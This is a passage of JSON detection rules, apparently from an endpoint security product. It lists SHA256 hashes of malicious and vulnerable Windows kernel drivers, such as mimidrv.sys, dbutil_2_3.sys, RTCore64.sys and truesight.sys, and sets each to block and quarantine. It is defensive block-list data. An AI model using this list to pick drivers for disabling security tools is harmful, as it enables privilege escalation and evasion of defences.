+ "hl_testing_start_time": "2026-03-23T11:45:30.470503Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bdd173909efc3bb3c5d216ea0fd9ec5e935c2572ef48973eeb0917b733ff754c",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aee701b0-c2e3-531a-b1fc-dd3bcf7eb01d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607204Z",
+ "creation_date": "2026-03-23T11:45:29.607206Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607212Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe4270a61dbed978c28b2915fcc2826d011148dcb7533fa8bd072ddce5944cef",
+ "comment": "Dell vulnerable driver (aka dbutil_2_3.sys) [CVE-2021-21551] [https://github.com/SpikySabra/Kernel-Cactus] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aee838be-03a4-5c4c-a1a3-3df8ccb52f2b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984982Z",
+ "creation_date": "2026-03-23T11:45:29.984986Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984994Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eb11a4270a6980a97ea8775422dacbd1e763b7e5898f0a80c71c91449fff7ab4",
+ "comment": "Dangerous Physmem Kernel Driver (aka BS_Def64.Sys) [https://www.loldrivers.io/drivers/4a80da66-f8f1-4af9-ba56-696cfe6c1e10/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aeecb672-0bee-5bc7-b8b9-749cc6c06120",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985898Z",
+ "creation_date": "2026-03-23T11:45:29.985900Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985905Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "24c900024d213549502301c366d18c318887630f04c96bf0a3d6ba74e0df164f",
+ "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aeee4d0e-095b-5bb9-8c98-17a3ef01269e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981314Z",
+ "creation_date": "2026-03-23T11:45:29.981316Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981322Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e2622d8e7a0ec136ba1fff639833f05137f8a1ff03e7a93b9a4aea25e7abb8d",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "af0ce512-2ea3-5221-a5ae-eb53191a24df",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487631Z",
+ "creation_date": "2026-03-23T11:45:31.487633Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487639Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c6692a2d344410c24137e8b1d9fb8756167c7e29139a9148699bc68144faf2fa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "af0d2ee1-0202-5f5f-a533-7385c2d84670",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825835Z",
+ "creation_date": "2026-03-23T11:45:30.825837Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825843Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d029a7d13535a3f296fa0699be78aa3566b92593f60d5842c816488cff36693c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "af12f81d-eb60-5ea0-bc6e-1bd268a67ec4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477607Z",
+ "creation_date": "2026-03-23T11:45:30.477611Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477620Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7cf756afcaf2ce4f8fb479fdede152a17eabf4c5c7c329699dab026a4c1d4fd0",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "af18d9e0-72d1-5a9f-ae4f-1a4c62ca085f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151212Z",
+ "creation_date": "2026-03-23T11:45:31.151214Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151220Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ccd57ee422366be97722b902cf530d071bc7315cbad77c6ebf86a432f685c4b4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "af1a895d-8eea-58d9-93d9-6eb2aa8d5c10",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472094Z",
+ "creation_date": "2026-03-23T11:45:30.472098Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472107Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "69640e9209f8e2ac25416bd3119b5308894b6ce22b5c80cb5d5f98f2f85d42ce",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "af357cc6-1102-5859-ae0c-385eb26338b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617799Z",
+ "creation_date": "2026-03-23T11:45:29.617801Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617806Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "da8945bd5c693c0593c9d0e3bda49bb1c6007cb25643c95708c6b10bef7c136a",
+ "comment": "Getac Technology vulnerable BIOS update tool (aka mtcBSv64.sys) [https://www.loldrivers.io/drivers/3bc629e8-7bf8-40c2-965b-87eb155e0065/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "af3cbd70-77ed-5e3e-a934-e83c74938306",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824682Z",
+ "creation_date": "2026-03-23T11:45:31.824684Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824692Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a84cd1c7cc9c0329e65fd5735586285239a010a5e83dd126c7504179a80918f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "af3d05a9-3635-501f-b289-43481c1d36a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808783Z",
+ "creation_date": "2026-03-23T11:45:31.808787Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808796Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fbe27ef8d48a5cf80ffd8e085cc4d40857fc946b0e3b99d4da0d1a765ee0639b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "af488912-f1d2-5ca4-ba64-a2217e0d7f01",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607630Z",
+ "creation_date": "2026-03-23T11:45:29.607632Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607637Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "696679114f6a106ec94c21e2a33fe17af86368bcf9a796aaea37ea6e8748ad6a",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "af48e9c3-a04f-5b91-837c-2c2c2ab58bca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604573Z",
+ "creation_date": "2026-03-23T11:45:29.604575Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604580Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5db0fe4b16744f14b4ab1d255a4d3c63710d0073417bae9bb3bfeef4a09d38e0",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "af58c950-3979-54af-b34b-46eec406dadb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615697Z",
+ "creation_date": "2026-03-23T11:45:29.615699Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615704Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a502c904a7fe42183d3ea66f1e01fbd4321eb202280b054b9124dd333f093ba2",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "af5ab8c8-e7eb-5beb-a908-cd7268cc62de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814147Z",
+ "creation_date": "2026-03-23T11:45:31.814150Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814166Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8862e36702119584f443eb9a4bcb8df31cd6364ed2e545e6fd0d2bdcc3f453d1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "af60699a-fd52-5f26-933e-09bfa83ee05a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481186Z",
+ "creation_date": "2026-03-23T11:45:30.481188Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481193Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d7d06d2f6af50ff5810c8d6a818cb59da635a56c0fdae5d0ed3d0aee4bedf3e",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "af6bc271-2a53-5ea8-9be0-14998853cb62",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980882Z",
+ "creation_date": "2026-03-23T11:45:29.980884Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980890Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ffd03584246730397e231eb8d16c1449aef2c3bc79bf9da3ebf8400a21b20ae7",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "af81c2bd-ee89-567a-843f-3a116ea3e92f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818031Z",
+ "creation_date": "2026-03-23T11:45:30.818033Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818038Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "442f12adebf7cb166b19e8aead2b0440450fd1f33f5db384a39776bb2656474a",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "af8c72ce-778f-5c29-bcc4-0a45ec488456",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813142Z",
+ "creation_date": "2026-03-23T11:45:31.813146Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813155Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "94fb2c5a93881c8202ece91e31428061bfb595cb17126a64b4f595fa99798c2e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "af9c28c1-7faf-5062-b560-ddb9f86b4e7b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811729Z",
+ "creation_date": "2026-03-23T11:45:31.811731Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811736Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f7f31df69b8dc1460966ba3c1921cf051ae82b33524b7d1670108b87f727ad8b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "afad859b-ccaa-5da7-af56-cd0b67e64e0a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477637Z",
+ "creation_date": "2026-03-23T11:45:30.477640Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477649Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "07af8c5659ad293214364789df270c0e6d03d90f4f4495da76abc2d534c64d88",
